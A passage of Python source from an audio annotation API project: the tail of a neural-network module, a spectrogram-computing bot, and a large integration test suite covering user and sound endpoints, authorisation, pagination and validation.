for f in self.final:
x = f(x)
x = F.leaky_relu(x, 0.2)
x = self.linear(x)
x = batchwise_unit_norm(x)
return x
```
#### File: annotate-api/examples/spectrogram_bot.py
```python
import requests
import zounds
from io import BytesIO
import numpy as np
from bot_helper import BinaryData, main, SoundListener
from log import module_logger
logger = module_logger(__file__)
N_FREQUENCY_BANDS = 512
SAMPLE_RATE = zounds.SR11025()
frequency_band = zounds.FrequencyBand(20, SAMPLE_RATE.nyquist)
scale = zounds.MelScale(frequency_band, N_FREQUENCY_BANDS)
FILTER_BANK_KERNEL_SIZE = 512
FILTER_BANK = zounds.spectral.morlet_filter_bank(
SAMPLE_RATE,
FILTER_BANK_KERNEL_SIZE,
scale,
scaling_factor=np.linspace(0.1, 1.0, len(scale)),
normalize=True)
FILTER_BANK *= zounds.AWeighting()
FILTER_BANK = np.array(FILTER_BANK)
class SpectrogramListener(SoundListener):
def __init__(self, client, s3_client, page_size=3, logger=None):
super().__init__(client, s3_client, page_size, logger)
def _process_samples(self, samples):
samples = samples.mono
samples = zounds.soundfile.resample(samples, SAMPLE_RATE)
windowing_sample_rate = zounds.SampleRate(
frequency=(FILTER_BANK_KERNEL_SIZE // 2) * SAMPLE_RATE.frequency,
duration=FILTER_BANK_KERNEL_SIZE * SAMPLE_RATE.frequency)
windowed = samples.sliding_window(windowing_sample_rate)
windowed = np.asarray(windowed)
spec = np.dot(FILTER_BANK, windowed.T).T
spec = np.abs(spec)
spec = 20 * np.log10(spec + 1)
spec = np.ascontiguousarray(spec).astype(np.float32)
spec = zounds.ArrayWithUnits(spec, [
zounds.TimeDimension(*windowing_sample_rate),
zounds.FrequencyDimension(scale)
])
binary_data = BinaryData(spec)
return binary_data
def _process_sound(self, sound):
# fetch audio
resp = requests.get(sound['audio_url'])
raw_audio = BytesIO(resp.content)
# processing pipeline to compute spectrograms
samples = zounds.AudioSamples.from_file(raw_audio).mono
binary_data = self._process_samples(samples)
# push output to s3
data_url = self.s3_client.put_object(
sound['id'],
binary_data.packed_file_like_object(),
'application/octet-stream')
logger.info(f'pushed binary data to {data_url}')
# create annotation
self.client.create_annotations(sound['id'], {
'start_seconds': 0,
'duration_seconds': sound['duration_seconds'],
'data_url': data_url
})
logger.info('created annotation')
if __name__ == '__main__':
main(
user_name='spectrogram_bot',
bucket_name='spectrogram-bot',
email='<EMAIL>',
about_me='spectrogram_bot.md',
info_url='https://en.wikipedia.org/wiki/Spectrogram',
listener_cls=SpectrogramListener,
logger=logger)
```
#### File: JohnVinyard/annotate-api/tests.py
```python
import unittest2
import requests
import subprocess
from http import client
import time
import os
import uuid
path, fn = os.path.split(__file__)
class BaseTests(object):
def _user_create_data(
self,
user_name=None,
password=None,
user_type=None,
email=None,
about_me=None):
return {
'user_name': 'user' if user_name is None else user_name,
'password': 'password' if password is None else password,
'user_type': user_type or 'human',
'email': '<EMAIL>' if email is None else email,
'about_me': about_me or 'Up and coming tennis star'
}
def _get_auth(self, user_create_data):
return user_create_data['user_name'], user_create_data['password']
def create_user(
self,
user_type='human',
user_name=None,
email=None,
about_me=None):
create_data = self._user_create_data(
user_name=user_name or uuid.uuid4().hex,
password=uuid.uuid4().hex,
user_type=user_type,
email=email or <EMAIL>'.format(uuid.uuid4().hex),
about_me=about_me or uuid.uuid4().hex
)
create_resp = requests.post(self.users_resource(), json=create_data)
self.assertEqual(client.CREATED, create_resp.status_code)
location = create_resp.headers['location']
return create_data, location
def sound_data(
self,
info_url=None,
audio_url=None,
license_type=None,
title=None,
duration_seconds=None,
tags=None,
low_quality_audio_url=None):
if audio_url is None:
audio_url = 'https://archive.org/download/Greatest_Speeches_of_the_20th_Century/AbdicationAddress.ogg'
if low_quality_audio_url is None:
low_quality_audio_url = audio_url
return dict(
info_url=info_url or 'https://archive.org/details/Greatest_Speeches_of_the_20th_Century',
audio_url=audio_url,
license_type=license_type or 'https://creativecommons.org/licenses/by/4.0',
title='Abdication Address - King Edward VIII' if title is None else title,
duration_seconds=duration_seconds or (6 * 60) + 42,
tags=tags,
low_quality_audio_url=low_quality_audio_url)
def annotation_data(
self,
tags=None,
data_url=None,
start_seconds=1,
duration_seconds=1):
return dict(
start_seconds=start_seconds,
duration_seconds=duration_seconds,
tags=tags,
data_url=data_url)
def _create_sound_with_user(self, auth, tags=None):
sound_id = uuid.uuid4().hex
sound_data = self.sound_data(
audio_url=f'https://example.com/{sound_id}', tags=tags)
resp = requests.post(
self.sounds_resource(), json=sound_data, auth=auth)
return resp.headers['location'].split('/')[-1]
def _create_sounds_with_user(self, auth, n_sounds, tags=None, delay=None):
for _ in range(n_sounds):
self._create_sound_with_user(auth, tags=tags)
if delay:
time.sleep(delay)
@classmethod
def startup_executable(cls):
return os.path.join(path, 'start.sh')
@classmethod
def stop_executable(cls):
return os.path.join(path, 'stop.sh')
@classmethod
def url(cls, path=''):
return 'http://localhost{path}'.format(**locals())
@classmethod
def root_resource(cls):
return cls.url()
@classmethod
def users_resource(cls, user_id=''):
return cls.url(f'/users/{user_id}')
@classmethod
def sounds_resource(cls, sound_id=''):
return cls.url(f'/sounds/{sound_id}')
@classmethod
def user_sounds_resource(cls, user_id=''):
return cls.url(f'/users/{user_id}/sounds')
@classmethod
def user_annotations_resource(cls, user_id=''):
return cls.url(f'/users/{user_id}/annotations')
@classmethod
def sound_annotations_resource(cls, sound_id=''):
return cls.url(f'/sounds/{sound_id}/annotations')
@classmethod
def annotations_resource(cls):
return cls.url('/annotations')
@classmethod
def delete_all_data(cls):
requests.delete(cls.root_resource())
@classmethod
def _health_check(cls):
for i in range(90):
time.sleep(1)
print('try number {i}'.format(**locals()))
try:
resp = requests.get(cls.root_resource())
resp.raise_for_status()
break
except (requests.HTTPError, requests.ConnectionError):
pass
@classmethod
def setUpClass(cls):
cls.process = subprocess.Popen([cls.startup_executable()], shell=True)
cls._health_check()
cls.delete_all_data()
@classmethod
def tearDownClass(cls):
cls.delete_all_data()
cls.process.terminate()
cls.process = subprocess.Popen(
[cls.stop_executable()], shell=True)
class SmokeTests(BaseTests, unittest2.TestCase):
"""
Basic tests to ensure that the API is up and responding to requests
"""
def tearDown(self):
self.delete_all_data()
def setUp(self):
self.resp = requests.get(self.root_resource())
def test_status_code_is_ok(self):
self.assertEqual(self.resp.status_code, client.OK)
def test_includes_sound_and_annotation_counts(self):
data = self.resp.json()
self.assertIn('totalSounds', data)
self.assertIn('totalAnnotations', data)
self.assertIn('totalUsers', data)
def test_root_resource_includes_cors_headers(self):
self.assertIn('Access-Control-Allow-Origin', self.resp.headers)
class UserTests(BaseTests, unittest2.TestCase):
"""
Tests to ensure user CRUD operations, including validation
"""
def tearDown(self):
self.delete_all_data()
def _get_links(self, user_type):
create_data = self._user_create_data(user_type=user_type)
create_resp = requests.post(self.users_resource(), json=create_data)
self.assertEqual(client.CREATED, create_resp.status_code)
uri = create_resp.headers['location']
user_resp = requests.get(
self.url(uri), auth=self._get_auth(create_data))
self.assertEqual(client.OK, user_resp.status_code)
return user_resp.json()['links']
def test_human_resource_should_include_link_to_owned_sounds(self):
links = self._get_links('human')
mapped = {l['rel']: l for l in links}
self.assertIn('sounds', mapped)
def test_human_resource_should_include_link_to_owned_annotations(self):
links = self._get_links('human')
mapped = {l['rel']: l for l in links}
self.assertIn('annotations', mapped)
def test_dataset_resource_should_include_link_to_owned_sounds(self):
links = self._get_links('dataset')
mapped = {l['rel']: l for l in links}
self.assertIn('sounds', mapped)
def test_dataset_resource_should_include_link_to_owned_annotations(self):
links = self._get_links('dataset')
mapped = {l['rel']: l for l in links}
self.assertIn('annotations', mapped)
def test_featurebot_resource_should_include_link_to_owned_annotations(self):
links = self._get_links('featurebot')
mapped = {l['rel']: l for l in links}
self.assertIn('annotations', mapped)
self.assertNotIn('sounds', mapped)
def test_aggregator_resource_should_include_no_links(self):
links = self._get_links('aggregator')
mapped = {l['rel']: l for l in links}
self.assertNotIn('sounds', mapped)
self.assertNotIn('annotations', mapped)
def test_user_resource_supports_cors(self):
resp = requests.options(self.users_resource())
self.assertIn('Access-Control-Allow-Origin', resp.headers)
def test_can_create_and_fetch_new_user(self):
create_data = self._user_create_data(user_name='HalIncandenza')
create_resp = requests.post(self.users_resource(), json=create_data)
self.assertEqual(client.CREATED, create_resp.status_code)
uri = create_resp.headers['location']
_id = uri.split('/')[-1]
user_resp = requests.get(
self.url(uri), auth=self._get_auth(create_data))
self.assertEqual(client.OK, user_resp.status_code)
self.assertEqual(
user_resp.json()['user_name'], create_data['user_name'])
self.assertEqual(user_resp.json()['id'], _id)
def test_can_get_user_by_username(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.get(
self.users_resource(user_name), auth=self._get_auth(user2))
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(user1_location, resp.headers['location'])
def test_can_head_user_by_username(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.head(
self.users_resource(user_name), auth=self._get_auth(user2))
self.assertEqual(client.NO_CONTENT, resp.status_code)
def test_get_non_existent_username_returns_not_found(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.get(
self.users_resource(user_name + 'X'), auth=self._get_auth(user2))
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_head_non_existent_username_returns_not_found(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.head(
self.users_resource(user_name + 'X'), auth=self._get_auth(user2))
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_head_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
resp = requests.head(
self.url(user2_location), auth=self._get_auth(user1))
self.assertEqual(client.NO_CONTENT, resp.status_code)
def test_head_returns_not_found_for_non_existent_user(self):
user1, user1_location = self.create_user()
resp = requests.head(
self.users_resource('1234'), auth=self._get_auth(user1))
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_unauthorized_when_attempting_to_list_users_without_creds(self):
list_users_resp = requests.get(self.users_resource())
self.assertEqual(list_users_resp.status_code, client.UNAUTHORIZED)
def test_can_page_through_users(self):
requesting_user, _ = self.create_user()
for _ in range(95):
self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': 10},
auth=self._get_auth(requesting_user))
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(10, len(resp_data['items']))
self.assertEqual(96, resp_data['total_count'])
items = [resp_data['items']]
while 'next' in resp_data:
current = requests.get(
self.url(resp_data['next']),
auth=self._get_auth(requesting_user))
resp_data = current.json()
items.append(resp_data['items'])
self.assertEqual(10, len(items))
self.assertEqual(6, len(items[-1]))
self.assertEqual(96, sum(len(item) for item in items))
def test_can_page_through_users_and_filter_by_user_type(self):
requesting_user, _ = self.create_user()
for _ in range(10):
self.create_user(user_type='human')
for _ in range(10):
self.create_user(user_type='featurebot')
resp = requests.get(
self.users_resource(),
params={'page_size': 3, 'user_type': 'featurebot'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(3, len(resp_data['items']))
self.assertEqual(10, resp_data['total_count'])
items = [resp_data['items']]
while 'next' in resp_data:
current = requests.get(
self.url(resp_data['next']),
auth=self._get_auth(requesting_user))
resp_data = current.json()
items.append(resp_data['items'])
self.assertEqual(4, len(items))
self.assertEqual(1, len(items[-1]))
self.assertEqual(10, sum(len(item) for item in items))
def test_can_filter_users_by_user_name(self):
requesting_user, _ = self.create_user()
auth = self._get_auth(requesting_user)
for _ in range(10):
self.create_user(user_type='human')
user_name = 'interesting_user'
self.create_user(user_name=user_name)
resp = requests.get(
self.users_resource(),
params={'page_size': 100, 'user_name': user_name},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
data = resp.json()
self.assertEqual(1, len(data['items']))
self.assertEqual(1, data['total_count'])
self.assertEqual(user_name, data['items'][0]['user_name'])
def test_can_view_most_data_about_self_when_listing_users(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
requesting_user_auth = self._get_auth(user1)
resp = requests.get(
self.users_resource(),
params={'page_size': 3},
auth=requesting_user_auth)
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(2, resp_data['total_count'])
self.assertEqual(2, len(resp_data['items']))
self.assertEqual(user1['email'], resp_data['items'][1]['email'])
def test_can_view_limited_data_about_other_user_when_listing_users(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
requesting_user_auth = self._get_auth(user1)
resp = requests.get(
self.users_resource(),
params={'page_size': 3},
auth=requesting_user_auth)
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(2, resp_data['total_count'])
self.assertEqual(2, len(resp_data['items']))
self.assertNotIn('email', resp_data['items'][0])
def test_bad_request_when_filtering_by_invalid_user_type(self):
requesting_user, _ = self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': 3, 'user_type': 'animal'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_page_size_is_negative(self):
requesting_user, _ = self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': -3, 'user_type': 'human'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_page_size_is_too_large(self):
requesting_user, _ = self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': 10000, 'user_type': 'human'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_can_view_most_data_about_self(self):
user1, user1_location = self.create_user()
resp = requests.get(
self.url(user1_location), auth=self._get_auth(user1))
self.assertIn('email', resp.json())
self.assertNotIn('password', resp.json())
def test_can_view_limited_data_about_other_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
resp = requests.get(
self.url(user1_location), auth=self._get_auth(user2))
self.assertNotIn('email', resp.json())
self.assertNotIn('password', resp.json())
def test_can_delete_self(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
auth = self._get_auth(user1)
uri = self.url(user1_location)
resp = requests.get(uri, auth=auth)
self.assertEqual(user1['email'], resp.json()['email'])
delete_resp = requests.delete(uri, auth=auth)
self.assertEqual(client.OK, delete_resp.status_code)
get_resp = requests.get(uri, auth=self._get_auth(user2))
self.assertEqual(client.NOT_FOUND, get_resp.status_code)
def test_cannot_delete_other_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
auth = self._get_auth(user1)
uri = self.url(user1_location)
resp = requests.get(uri, auth=auth)
self.assertEqual(user1['email'], resp.json()['email'])
delete_resp = requests.delete(uri, auth=self._get_auth(user2))
self.assertEqual(client.FORBIDDEN, delete_resp.status_code)
def test_not_found_when_deleting_non_existent_user(self):
user1, user1_location = self.create_user()
delete_resp = requests.delete(
self.users_resource('1234'), auth=self._get_auth(user1))
self.assertEqual(client.NOT_FOUND, delete_resp.status_code)
def test_unauthorized_when_deleting_user_without_creds(self):
delete_resp = requests.delete(self.users_resource('1234'))
self.assertEqual(client.UNAUTHORIZED, delete_resp.status_code)
def test_unauthorized_when_fetching_single_user_without_creds(self):
user1, user1_location = self.create_user()
user_resp = requests.get(self.url(user1_location))
self.assertEqual(client.UNAUTHORIZED, user_resp.status_code)
def test_validation_error_for_bad_user_type(self):
user1_data = self._user_create_data(user_type='animal')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual('user_type', desc[0][0])
def test_validation_error_for_bad_user_name(self):
user1_data = self._user_create_data(user_name='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual(1, len(desc))
self.assertEqual('user_name', desc[0][0])
def test_validation_error_for_bad_password(self):
user1_data = self._user_create_data(password='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
print(resp.json())
self.assertEqual(1, len(desc))
self.assertEqual('password', desc[0][0])
def test_validation_error_for_bad_email(self):
user1_data = self._user_create_data(email='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual(1, len(desc))
self.assertEqual('email', desc[0][0])
def test_validation_error_has_information_about_multiple_problems(self):
user1_data = self._user_create_data(user_name='', email='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual(2, len(desc))
fields = set(d[0] for d in desc)
self.assertIn('user_name', fields)
self.assertIn('email', fields)
def test_usernames_must_be_unique(self):
user1_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.CREATED, resp.status_code)
user2_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp2 = requests.post(self.users_resource(), json=user2_data)
self.assertEqual(client.CONFLICT, resp2.status_code)
def test_email_addresses_must_be_unique(self):
user1_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.CREATED, resp.status_code)
user2_data = self._user_create_data(
user_name='user2', email='<EMAIL>')
resp2 = requests.post(self.users_resource(), json=user2_data)
self.assertEqual(client.CONFLICT, resp2.status_code)
def test_location_header_is_included_when_conflict_is_encountered(self):
user1_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.CREATED, resp.status_code)
expected_location = resp.headers['location']
user2_data = self._user_create_data(
user_name='user2', email='<EMAIL>')
resp2 = requests.post(self.users_resource(), json=user2_data)
self.assertEqual(expected_location, resp2.headers['location'])
def test_can_update_about_me_text(self):
user1, user1_location = self.create_user(
user_type='human', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'about_me': 'modified'}, auth=auth)
self.assertEqual(client.OK, resp.status_code)
resp = requests.get(
self.url(user1_location), auth=auth)
self.assertEqual('modified', resp.json()['about_me'])
def test_cannot_update_other_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user2_location), json={'about_me': 'modified'}, auth=auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_invalid_about_me_update_for_featurebot_fails(self):
user1, user1_location = self.create_user(
user_type='dataset', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'about_me': ''}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_invalid_about_me_update_for_dataset_fails(self):
user1, user1_location = self.create_user(
user_type='featurebot', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'about_me': ''}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_can_update_password(self):
user1, user1_location = self.create_user(
user_type='human', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'password': '<PASSWORD>'}, auth=auth)
self.assertEqual(client.OK, resp.status_code)
# using the original password
resp = requests.get(
self.url(user1_location), auth=auth)
self.assertEqual(client.UNAUTHORIZED, resp.status_code)
# using the new password
new_auth = (user1['user_name'], 'modified')
resp = requests.get(
self.url(user1_location), auth=new_auth)
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(user1['email'], resp.json()['email'])
def test_cannot_update_username(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'user_name': 'modified'}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_cannot_update_email(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'email': 'modified'}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_not_found_for_non_existent_user(self):
user1, user1_location = self.create_user()
user_resp = requests.get(
self.users_resource('1234'), auth=self._get_auth(user1))
self.assertEqual(client.NOT_FOUND, user_resp.status_code)
def test_unauthorized_when_fetching_non_existent_user_without_creds(self):
user_resp = requests.get(self.users_resource('1234'))
self.assertEqual(client.UNAUTHORIZED, user_resp.status_code)
class SoundTests(BaseTests, unittest2.TestCase):
def tearDown(self):
self.delete_all_data()
def test_dataset_can_create_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(sound_data['info_url'], sound_resp.json()['info_url'])
def test_created_by_user_name_is_included(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(
user1['user_name'], sound_resp.json()['created_by_user_name'])
def test_can_create_sound_with_low_quality_url(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
audio_url = 'https://example.com/audio.wav'
low_quality_audio_url = 'https://example.com/audio.mp3'
sound_data = self.sound_data(
audio_url=audio_url,
low_quality_audio_url=low_quality_audio_url)
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(audio_url, sound_resp.json()['audio_url'])
self.assertEqual(
low_quality_audio_url, sound_resp.json()['low_quality_audio_url'])
def test_cannot_create_duplicate_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CONFLICT, resp.status_code)
def test_location_header_is_returned_when_creating_duplicate_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
expected_location = resp.headers['location']
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CONFLICT, resp.status_code)
self.assertEqual(expected_location, resp.headers['location'])
def test_featurebot_cannot_create_sound(self):
user1, user1_location = self.create_user(user_type='featurebot')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_aggregator_cannot_create_sound(self):
user1, user1_location = self.create_user(user_type='aggregator')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_unauthorized_when_creating_sound_anonymously(self):
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data)
self.assertEqual(client.UNAUTHORIZED, resp.status_code)
def test_bad_request_for_bad_info_url(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(info_url='blah')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_bad_audio_url(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(audio_url='blah')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_bad_license_type(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(license_type='blah')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_missing_title(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(title='')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_missing_duration(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data()
del sound_data['duration_seconds']
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_explicit_created_by_is_ignored(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
sound_data['created_by'] = '1234'
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(user1_location, sound_resp.json()['created_by'])
def test_user_is_returned_as_uri(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(user1_location, sound_resp.json()['created_by'])
def test_sound_includes_link_to_annotations(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
links = {link['rel']: link for link in sound_resp.json()['links']}
self.assertIn('annotations', links)
def test_can_head_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.head(self.url(sound_location), auth=auth)
self.assertEqual(client.NO_CONTENT, sound_resp.status_code)
def test_unauthorized_when_getting_sound_anonymously(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.head(self.url(sound_location))
self.assertEqual(client.UNAUTHORIZED, sound_resp.status_code)
def test_sounds_are_immutable(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.patch(
self.url(sound_location),
json={'info_url': 'https://example.com'},
auth=auth)
self.assertEqual(client.METHOD_NOT_ALLOWED, sound_resp.status_code)
def test_cannot_delete_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.delete(self.url(sound_location), auth=auth)
self.assertEqual(client.METHOD_NOT_ALLOWED, sound_resp.status_code)
def test_can_list_sounds(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 93)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 10},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(10, len(resp_data['items']))
self.assertEqual(93, resp_data['total_count'])
items = [resp_data['items']]
while 'next' in resp_data:
current = requests.get(
self.url(resp_data['next']),
auth=auth)
resp_data = current.json()
items.append(resp_data['items'])
self.assertEqual(10, len(items))
self.assertEqual(3, len(items[-1]))
self.assertEqual(93, sum(len(item) for item in items))
def test_can_list_sounds_by_user_id(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
user2_id = user1_location.split('/')[-1]
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 10, 'created_by': user2_id},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_list_sounds_by_tag(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5, tags=['test'])
self._create_sounds_with_user(auth, 5, tags=['train'])
resp = requests.get(
self.sounds_resource(),
params={'page_size': 10, 'tags': 'test'},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
def test_can_stream_sounds_by_user_id(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
user2_id = user1_location.split('/')[-1]
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 2, 'created_by': user2_id},
auth=auth)
items = resp.json()['items']
self.assertEqual(2, len(items))
user_uri = f'/users/{user2_id}'
